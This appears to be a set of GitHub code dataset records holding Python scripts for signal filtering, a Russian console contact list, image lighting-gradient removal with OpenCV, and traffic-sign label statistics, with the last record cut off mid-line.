filtering.\"\"\"\n# Python imports\nimport sys\nimport random\n\n# Dependency imports\nimport numpy as np\nimport pyqtgraph as pg\n\n# Package imports\nfrom .. import signal\n\ndef square_wave(length, gaussian_noisiness=2, salt_pepper_noisiness=2, amplitude=100):\n \"\"\"Returns a noisy square wave signal.\n High values have gaussian noise, while low values have salt-and-pepper noise.\n \"\"\"\n i = 0\n while i < length:\n for _ in range(0, 50):\n yield (i, 0 + random.gauss(0, gaussian_noisiness))\n i = i + 1\n for _ in range(0, 50):\n yield (i, amplitude * (random.randint(0, amplitude - 1) > salt_pepper_noisiness))\n i = i + 1\ndef sine_wave(length, gaussian_noisiness=2, amplitude=50):\n \"\"\"Returns a noisy sine wave signal with gaussian noise.\"\"\"\n i = 0\n sample_points = np.linspace(0.0, 2 * np.pi, num=length)\n wave = amplitude * (1 + np.sin(2 * np.pi * sample_points))\n for i in range(0, length):\n yield (i, wave[i] + random.gauss(0, gaussian_noisiness))\n\ndef stream(signal_generator):\n \"\"\"Continuously generates noisy data and filters it, then plots the results.\"\"\"\n signal_length = 500\n filterer = signal.moving_filter(10)\n\n # Plotting\n signal_x = []\n signal_y = []\n filtered_x = []\n filtered_y = []\n\n for (sample_number, sample) in signal_generator(signal_length):\n signal_x.append(sample_number)\n signal_y.append(sample)\n filtered = filterer.send((sample_number, sample))\n if filtered is not None:\n filtered_x.append(filtered[0])\n filtered_y.append(filtered[1])\n\n graph = pg.plot()\n graph.addLegend()\n graph.plot(signal_x, signal_y, pen='r', name=\"Raw (Noisy) Signal\")\n graph.plot(filtered_x, filtered_y, pen='b', name=\"Filtered Signal\")\n\nif __name__ == \"__main__\":\n pg.setConfigOptions(antialias=True, background='w', foreground='k')\n stream(square_wave)\n stream(sine_wave)\n sys.exit(pg.Qt.QtGui.QApplication.instance().exec_())\n", "repo_name": "ethanjli/vera-sleeve", "sub_path": "verasleeve/tests/signal_filtering.py", "file_name": "signal_filtering.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.gauss", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "random.gauss", "line_number": 32, "usage_type": "call"}, {"api_name": "pyqtgraph.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "pyqtgraph.setConfigOptions", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt.QtGui.QApplication.instance", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "12326641246", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom datetime import date, datetime\n\nif __name__ == '__main__':\n # Список работников.\n people = []\n\n # Организовать бесконечный цикл запроса команд.\n while True:\n # Запрос команды\n command = input(\">>> \").lower()\n\n # Выполнить действие в соответствие с командой.\n if command == 'exit':\n break\n\n elif command == 'add':\n # Запросить данные о работнике.\n name = input(\"Фамилия и инициалы? \")\n post = input(\"Телефон? \")\n #year = input(\"Дата рождения? \")\n\n #year = date(int(year[2]), int(year[1]), int(year[0]))\n year = input(\"Введите дату рождения (гггг.мм.дд): \")\n year = year.split(\".\")\n year = date(int(year[0]), int(year[1]), int(year[2]))\n\n\n # Создать словарь.\n man = {\n 'name': name,\n 'tel': post,\n 'date': year,\n }\n\n # Добавить словарь в список.\n people.append(man)\n # Отсортировать список в случае необходимости.\n if len(people) > 1:\n people.sort(key=lambda item: item.get('tel', ''))\n\n elif command == 'list':\n # Заголовок таблицы.\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 20\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^20} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n\n # Вывести данные о всех сотрудниках.\n for idx, man in enumerate(people, 1):\n print(\n '| {:>4} | {:<30} | {:<20} | {:>20} |'.format(\n idx,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', ''))\n )\n )\n print(line)\n\n elif command.startswith('select'):\n\n # Разбить команду на части.\n parts = command.split(' ', maxsplit=1)\n # Получить имя.\n period = parts[1]\n count = 0\n # Проверить сведения работников из списка.\n for man in people:\n if man.get('name', period).lower() == period.lower():\n count += 1\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 12\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^12} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n print(\n '| {:>4} | {:<30} | {:<20} | {:>12} |'.format(\n count,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', 0))\n )\n )\n print(line)\n\n\n # Если счетчик равен 0, то работники не найдены.\n if count == 0:\n print(\"Люди с заданным именем не найдены.\")\n\n elif command == 'help':\n # Вывести справку о работе с программой.\n print(\"Список команд:\\n\")\n print(\"add - добавить человека;\")\n print(\"list - вывести список людей;\")\n print(\"select <имя> - запросить людей с этим именем;\")\n print(\"help - отобразить справку;\")\n print(\"exit - завершить работу с программой.\")\n\n else:\n print(f\"Неизвестная команда {command}\", file=sys.stderr)\n", "repo_name": "AndrejMirrox/labor-9", "sub_path": "PyCharm/Individual.py", "file_name": "Individual.py", "file_ext": "py", "file_size_in_byte": 4802, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 128, "usage_type": "attribute"}]} +{"seq_id": "2089442678", "text": "\"\"\"\r\n\r\n조명에 의해 생긴 Gradation을 제거하기 위해...\r\n\r\nclass removeLightGradation():\r\n 1. Check Image Size \r\n 2. LAB모델을 이용한 Color Space (RGB -> LAB변환)\r\n 3. Median Filter(Radius : 20 ~ 50, 100 : 실제와 가장 근사한 조명상태 구현)\r\n 4. 3번 이미지 반전하여 역조명 채널 생성\r\n 5. 원본영상에 합성\r\n 6. Histogram 최대-최소평균으로 Golbal Thresholding\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom cv2 import cv2\r\nimport math\r\n\r\n\r\nclass removeLightGradation:\r\n\r\n def __init__(self, img):\r\n self.img = img\r\n \r\n\r\n def convertLAB(self):\r\n return cv2.cvtColor(self.img, cv2.COLOR_BGR2LAB)\r\n\r\n\r\n def addMedianFilter(self, labImg, val = 55):\r\n filterImg = cv2.medianBlur(labImg, val)\r\n return filterImg\r\n \r\n\r\n def createReverseImg(self, filterImg):\r\n return cv2.bitwise_not(filterImg)\r\n\r\n\r\n def mergeImg(self, img1, img2):\r\n return cv2.add(img1, img2)\r\n \r\n def imgBlending(self, img1, img2, val):\r\n return cv2.addWeighted(img1, val, img2, 1-val, 0)\r\n\r\n\r\n def globalThresholding(self, img):\r\n #Histogram 의 최대-최소 평균으로 Global Thresholding\r\n ret, thr = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n return thr\r\n\r\n def thresholding(self, img, threshold = 127, value = 255):\r\n #ret, thr9 = cv2.threshold(img, threshold, value, cv2.THRESH_BINARY)\r\n thr10 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)\r\n thr11 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\r\n\r\n titles = ['adaptive mean', 'adaptive gaussian']\r\n images = [thr10, thr11]\r\n showPlot(titles, images)\r\n\r\n\r\ndef showImg(title, img):\r\n cv2.imshow(title, img)\r\n\r\n cv2.waitKey(0)\r\n #k=cv2.waitKey(0) & 0xFF\r\n # if k == ord('s'):\r\n cv2.destroyAllWindows()\r\n\r\n\r\ndef showPlot(titles, images):\r\n \r\n num = len(titles)\r\n \r\n if num % 2 :\r\n row = int(num/2) + 1\r\n else:\r\n row = int(num/2)\r\n \r\n #print(\"num = {1}, row = {0}\".format(row, num))\r\n \r\n cnt = 0\r\n for i in range(0,row):\r\n cnt+=1\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1))\r\n\r\n cnt+=1\r\n \r\n try:\r\n if titles[i+2]:\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1)) \r\n except:\r\n pass \r\n \r\n plt.show()\r\n\r\n\r\ndef viewResult2(viewData, row, camp = ''):\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n dataLen = len(viewData)\r\n cols = math.ceil(dataLen/row)\r\n #print(\"cols = \", cols)\r\n\r\n i = 1\r\n for key, val in viewData.items():\r\n subplotNo = str(cols)+str(row)+str(i)\r\n #print('key = ', key)\r\n #print('subplotNo = ', subplotNo)\r\n #cv2.imshow(key, val)\r\n\r\n\r\n if(camp == 'gray') : \r\n plt.subplot(subplotNo), plt.imshow(val, cmap = 'gray')\r\n plt.title(key), plt.xticks([]), plt.yticks([])\r\n else :\r\n plt.subplot(subplotNo), plt.imshow(val)\r\n plt.title(key), plt.xticks([]), plt.yticks([]) \r\n\r\n i = i + 1\r\n # End of for key, val int viewData.items():\r\n plt.show()\r\n\r\n\r\n# End of viewResult2()\r\n# for i in range(1,11):\r\n# if i % 2 :\r\n# row = int(i/2) + 1\r\n# else:\r\n# row = int(i / 2)\r\n# #print(\"int({0} / 2) = {1}, int(round( {0} / 2)) = {2}\".format(i, int(i/2), int(round(i/2))))\r\n# print(\"i = {0}, row = {1}\".format(i, row))\r\n\r\n\r\n# Open Image - Color Image로 Open 해야 함.... \r\nimg = cv2.imread('gradation03.jpg', cv2.IMREAD_COLOR)\r\nshowImg(\"원본\", img)\r\n\r\nrt = removeLightGradation(img)\r\n\r\n# Change Color Space to LAB \r\nlabImg = rt.convertLAB()\r\n#showImg('LAB', labImg)\r\n\r\n# split Channel\r\nl, a, b = cv2.split(labImg)\r\n#showImg('labImg - l', l)\r\n#showImg('labImg - a', a)\r\n#showImg('labImg - b', b)\r\n\r\n\r\n# add Median Filter\r\nfilterImg = rt.addMedianFilter(l, 55)\r\n#showImg('Median 99', filterImg)\r\nlabFilterImg = rt.addMedianFilter(labImg, 55)\r\n\r\n# make sub Img(white - img)\r\nc, r = l.shape\r\noutImg = np.ones((c,r), np.uint8)*255\r\n#showImg('outImg', outImg)\r\n#print(l.shape)\r\n#print(outImg)\r\nsubImg = outImg - l\r\n#showImg('subImg', subImg)\r\n\r\nviewData = {'original':img, 'l':l, 'outImg':outImg, 'subImg':subImg}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\nfor i in range(1,6):\r\n subImg = outImg - subImg\r\nshowImg('subImg', subImg)\r\n\r\n# make Reverse Image\r\nreverseImg = rt.createReverseImg(filterImg)\r\n#showImg('reverseImg', reverseImg)\r\nreverseImg1 = rt.createReverseImg(labFilterImg)\r\ngrayReverseImg = cv2.cvtColor(reverseImg1, cv2.COLOR_LAB2BGR)\r\ngrayReverseImg = cv2.cvtColor(grayReverseImg, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\ntitles = ['Filter Img - l', 'Filter Img - LAB', 'Reverse Img - l', 'Reverse Img - LAB', 'Gray Reverse Img - LAB']\r\nimages = [filterImg, labFilterImg, reverseImg, reverseImg1, grayReverseImg]\r\nshowPlot(titles, images)\r\n\r\n\r\n\r\n# Image merge\r\nmergeImg = rt.mergeImg(l, reverseImg)\r\nmergeImg1 = rt.mergeImg(l, grayReverseImg)\r\nBlendingImg = rt.imgBlending(l, reverseImg, 0.5)\r\nBlendingImg1 = rt.imgBlending(l, grayReverseImg, 0.5)\r\n\r\ntitles = [\"Merge Img - l\", \"Merge Img - LAB\", \"Blending Img - l\", \"Blending Img - LAB\", 'Original Img']\r\nimages = [mergeImg, mergeImg1, BlendingImg, BlendingImg1, img]\r\nshowPlot(titles, images)\r\n\r\n# viewData = {\"Merge Img - l\":mergeImg, \"Merge Img - LAB\":mergeImg1, \"Blending Img - l\":BlendingImg, \"Blending Img - LAB\":BlendingImg1, 'Original Img':img}\r\n# viewResult2(viewData, 2)\r\n\r\n\r\nresultImg = rt.globalThresholding(mergeImg)\r\nresultImg1 = rt.globalThresholding(mergeImg1)\r\nresultImg2 = rt.globalThresholding(BlendingImg)\r\nresultImg3 = rt.globalThresholding(BlendingImg1)\r\n\r\n# titles = ['Threshold - Merge_L', 'Threshold Merge_LAB', 'Threshold - Blending_L', 'Threshold - Blending_LAB', 'Original Img']\r\n# images = [resultImg, resultImg1, resultImg2, resultImg3, img]\r\n# showPlot(titles, images)\r\n\r\nviewData = {'Threshold - Merge_L' : resultImg, 'Threshold Merge_LAB' : resultImg1, 'Threshold - Blending_L' : resultImg2, 'Threshold - Blending_LAB' : resultImg3, 'Original Img': img}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\n\r\n# showImg('Result Img', resultImg)\r\n\r\n# rt.thresholding(resultImg)\r\n# rt.thresholding(resultImg1)\r\n# rt.thresholding(resultImg2)\r\n# rt.thresholding(resultImg3)\r\n\r\n\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "SSKim76/Python_Test", "sub_path": "removeGradation.py", "file_name": "removeGradation.py", "file_ext": "py", "file_size_in_byte": 6904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.cv2.cvtColor", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 28, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2LAB", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.cv2.medianBlur", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 32, "usage_type": "name"}, {"api_name": "cv2.cv2.bitwise_not", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 37, "usage_type": "name"}, {"api_name": "cv2.cv2.add", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 41, "usage_type": "name"}, {"api_name": "cv2.cv2.addWeighted", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 44, "usage_type": "name"}, {"api_name": "cv2.cv2.threshold", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_OTSU", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 54, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_MEAN_C", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 55, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 63, "usage_type": "name"}, {"api_name": "cv2.cv2.waitKey", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 65, "usage_type": "name"}, {"api_name": "cv2.cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "cv2.cv2.imread", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 140, "usage_type": "name"}, {"api_name": "cv2.cv2.IMREAD_COLOR", "line_number": 140, "usage_type": "attribute"}, {"api_name": "cv2.cv2.split", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 163, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 181, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_LAB2BGR", "line_number": 181, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 182, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2GRAY", "line_number": 182, "usage_type": "attribute"}]} +{"seq_id": "985754575", "text": "import sys, os, argparse, csv, zipfile\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\n\nclass Generator():\n\n def __init__(self, path, classes=range(1, 156)):\n self.classes = classes\n self.labelmap = {0: \"speed limit 20 (prohibitory)\",\n 1: \"speed limit 30 (prohibitory)\",\n 2: \"speed limit 50 (prohibitory)\",\n 3: \"speed limit 60 (prohibitory)\",\n 4: \"speed limit 70 (prohibitory)\",\n 5: \"speed limit 80 (prohibitory)\",\n 6: \"restriction ends 80 (other)\",\n 7: \"speed limit 100 (prohibitory)\",\n 8: \"speed limit 120 (prohibitory)\",\n 9: \"no overtaking (prohibitory)\",\n 10: \"no overtaking (trucks) (prohibitory)\",\n 11: \"priority at next intersection (danger)\",\n 12: \"priority road (other)\",\n 13: \"give way (other)\",\n 14: \"stop (other)\",\n 15: \"no traffic both ways (prohibitory)\",\n 16: \"no trucks (prohibitory)\",\n 17: \"no entry (other)\",\n 18: \"danger (danger)\",\n 19: \"bend left (danger)\",\n 20: \"bend right (danger)\",\n 21: \"bend (danger)\",\n 22: \"uneven road (danger)\",\n 23: \"slippery road (danger)\",\n 24: \"road narrows (danger)\",\n 25: \"construction (danger)\",\n 26: \"traffic signal (danger)\",\n 27: \"pedestrian crossing (danger)\",\n 28: \"school crossing (danger)\",\n 29: \"cycles crossing (danger)\",\n 30: \"snow (danger)\",\n 31: \"animals (danger)\",\n 32: \"restriction ends (other)\",\n 33: \"go right (mandatory)\",\n 34: \"go left (mandatory)\",\n 35: \"go straight (mandatory)\",\n 36: \"go right or straight (mandatory)\",\n 37: \"go left or straight (mandatory)\",\n 38: \"keep right (mandatory)\",\n 39: \"keep left (mandatory)\",\n 40: \"roundabout (mandatory)\",\n 41: \"restriction ends (overtaking) (other)\",\n 42: \"restriction ends (overtaking (trucks)) (other)\",\n 43: \"restriction ends 60 (other)\",\n 44: \"restriction ends 70 (other)\",\n 45: \"speed limit 90 (prohibitory)\",\n 46: \"restriction ends 90 (other)\",\n 47: \"speed limit 110 (prohibitory)\",\n 48: \"restriction ends 110 (other)\",\n 49: \"restriction ends 120 (other)\",\n 50: \"speed limit 130 (prohibitory)\",\n 51: \"restriction ends 130 (other)\",\n 52: \"bend double right (danger)\",\n 53: \"highway turn (left) (other)\",\n 54: \"maximum width (prohibitory)\",\n 55: \"maximum height (prohibitory)\",\n 56: \"minimum truck distance (prohibitory)\",\n 57: \"highway exit 200 (other)\",\n 58: \"highway exit 100 (other)\",\n 59: \"right lane merging (other)\",\n 60: \"warning beacon roadwork (other)\",\n 61: \"speed limit 60 (digital) (prohibitory)\",\n 62: \"restriction ends 60 (digital) (other)\",\n 63: \"speed limit 70 (digital) (prohibitory)\",\n 64: \"restriction ends 70 (digital) (other)\",\n 65: \"speed limit 80 (digital) (prohibitory)\",\n 66: \"restriction ends 80 (digital) (other)\",\n 67: \"restriction ends 80 (digital) (other)\",\n 68: \"restriction ends 90 (digital) (other)\",\n 69: \"speed limit 100 (digital) (prohibitory)\",\n 70: \"restriction ends 100 (digital) (other)\",\n 71: \"speed limit 110 (digital) (prohibitory)\",\n 72: \"restriction ends 110 (digital) (other)\",\n 73: \"left lane merging (other)\",\n 74: \"speed limit 120 (digital) (prohibitory)\",\n 75: \"restriction ends 120 (digital) (other)\",\n 76: \"speed limit 130 (digital) (prohibitory)\",\n 77: \"restriction ends 130 (digital) (other)\",\n 78: \"no overtaking (digital) (prohibitory)\",\n 79: \"restriction ends 130 (digital) (other)\",\n 80: \"no overtaking (trucks) (digital) (prohibitory)\",\n 81: \"restriction ends (overtaking (trucks)) (other)\",\n 82: \"construction (digital) (danger)\",\n 83: \"traffic jam (digital) (danger)\",\n 84: \"highway exit (other)\",\n 85: \"traffic jam (other)\",\n 86: \"restriction distance (other)\",\n 87: \"restriction time (other)\",\n 88: \"highway exit 300m (other)\",\n 89: \"restriction ends 100 (other)\",\n 90: \"andreaskreuz (other)\",\n 91: \"one way street (left) (other)\",\n 92: \"one way street (right) (other)\",\n 93: \"beginning of highway (other)\",\n 94: \"end of highway (other)\",\n 95: \"busstop (other)\",\n 96: \"tunnel (other)\",\n 97: \"no cars (prohibitory)\",\n 98: \"train crossing (danger)\",\n 99: \"no bicycles (prohibitory)\",\n 100: \"no motorbikes (prohibitory)\",\n 101: \"no mopeds (prohibitory)\",\n 102: \"no horses (prohibitory)\",\n 103: \"no cars & motorbikes (prohibitory)\",\n 104: \"busses only (mandatory)\",\n 105: \"pedestrian zone (mandatory)\",\n 106: \"bicycle boulevard (mandatory)\",\n 107: \"end of bicycle boulevard (mandatory)\",\n 108: \"bicycle path (mandatory)\",\n 109: \"pedestrian path (mandatory)\",\n 110: \"pedestrian and bicycle path (mandatory)\",\n 111: \"separated path for bicycles and pedestrians (right) (mandatory)\",\n 112: \"separated path for bicycles and pedestrians (left) (mandatory)\",\n 113: \"play street (other)\",\n 114: \"end of play street (other)\",\n 115: \"beginning of motorway (other)\",\n 116: \"end of motorway (other)\",\n 117: \"crosswalk (zebra) (other)\",\n 118: \"dead-end street (other)\",\n 119: \"one way street (straight) (other)\",\n 120: \"priority road (other)\",\n 121: \"no stopping (prohibitory)\",\n 122: \"no stopping (beginning) (prohibitory)\",\n 123: \"no stopping (middle) (prohibitory)\",\n 124: \"no stopping (end) (prohibitory)\",\n 125: \"no parking (beginning) (prohibitory)\",\n 126: \"no parking (end) (prohibitory)\",\n 127: \"no parking (middle) (prohibitory)\",\n 128: \"no parking (prohibitory)\",\n 129: \"no parking zone (prohibitory)\",\n 130: \"end of no parking zone (prohibitory)\",\n 131: \"city limit (in) (other)\",\n 132: \"city limit (out) (other)\",\n 133: \"direction to village (other)\",\n 134: \"rural road exit (other)\",\n 135: \"speed limit 20 zone (prohibitory)\",\n 136: \"end speed limit 20 zone (prohibitory)\",\n 137: \"speed limit 30 zone (prohibitory)\",\n 138: \"end speed limit 30 zone (prohibitory)\",\n 139: \"speed limit 5 (prohibitory)\",\n 140: \"speed limit 10 (prohibitory)\",\n 141: \"restriction ends 10 (other)\",\n 142: \"restriction ends 20 (other)\",\n 143: \"restriction ends 30 (other)\",\n 144: \"speed limit 40 (prohibitory)\",\n 145: \"restriction ends 40 (other)\",\n 146: \"restriction ends 50 (other)\",\n 147: \"go left (now) (mandatory)\",\n 148: \"go right (now) (mandatory)\",\n 149: \"train crossing in 300m (other)\",\n 150: \"train crossing in 200m (other)\",\n 151: \"train crossing in 100m (other)\",\n 152: \"danger (digital) (danger)\",\n 153: \"restriction ends 100 (other)\",\n 154: \"highway turn (right) (other)\"}\n\n self.PATH = path\n self.label_names = []\n self.label_paths = []\n\n for p, dirs, filenames in os.walk(self.PATH):\n self.label_names += [f for f in filenames if f[-3:] == 'xml']\n self.label_paths += [os.path.join(p, f) for f in filenames if f[-3:] == 'xml']\n\n self.class_score = self._calculateClassScore()\n\n def deleteEmptyImages(self, path=None):\n if not path:\n path = self.PATH\n\n for p, dirs, filenames in os.walk(path):\n for file in [f for f in filenames if f[-3:] == 'png']:\n if file[:-3] + 'xml' not in self.label_names:\n os.remove(os.path.join(p, file))\n print(\"%i deleted due to missing label!\" % (os.path.join(p, file)))\n\n def _calculateClassScore(self, ):\n class_score = {}\n\n for label in self.label_paths:\n\n for ob in ET.parse(label).getroot().iter('object'):\n\n try:\n clazz = int(ob.find('name').text)\n xmin, ymin, xmax, ymax = [int(v.text) for v in ob.find('bndbox')]\n except:\n print(\"Fehlerhafte Klassenangabe in \" + label)\n continue\n\n if clazz in class_score:\n class_score[clazz][0] += 1\n class_score[clazz][1] += xmin\n class_score[clazz][2] += ymin\n class_score[clazz][3] += xmax\n class_score[clazz][4] += ymax\n else:\n class_score[clazz] = [1, xmin, ymin, xmax, ymax]\n\n for c in class_score:\n s = class_score[c][0]\n class_score[c][1] = round(class_score[c][1] / s, 2)\n class_score[c][2] = round(class_score[c][2] / s, 2)\n class_score[c][3] = round(class_score[c][3] / s, 2)\n class_score[c][4] = round(class_score[c][4] / s, 2)\n return class_score\n\n def _getClassName(self, i):\n if i in self.labelmap:\n return self.labelmap[i]\n else:\n return \"Unknown\"\n\n def createCSVOverview(self, zipf=None):\n\n with open(os.path.join(self.PATH, \"Summary.csv\"), 'w', newline='') as out:\n writer = csv.writer(out, delimiter=',', quoting=csv.QUOTE_NONE)\n writer.writerow(['Class ID', 'Class Name', 'Frequency', 'Avg Xmin', 'Avg Ymin', 'Avg Xmax', 'Avg Ymax'])\n for c in self.class_score:\n if c in self.classes:\n writer.writerow([c, self._getClassName(c), *self.class_score[c]])\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'Summary.csv'), 'Summary.csv', zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'Summary.csv'))\n print(\"CSV Overview successfully created.\")\n\n def createPieChart(self, zipf=None):\n fig, ax = plt.subplots(figsize=(72, 36), subplot_kw=dict(aspect=\"equal\"))\n\n data = [self.class_score[x][0] for x in self.class_score if x in self.classes]\n label = [self._getClassName(x) for x in self.class_score if x in self.classes]\n\n def func(pct, allvals):\n absolute = int(pct / 100. * np.sum(allvals))\n return \"{:.1f}% ({:d})\".format(pct, absolute)\n\n wedges, texts, autotexts = ax.pie(data, autopct=lambda pct: func(pct, data),\n textprops=dict(color=\"w\"))\n\n legend = ax.legend(wedges, label,\n 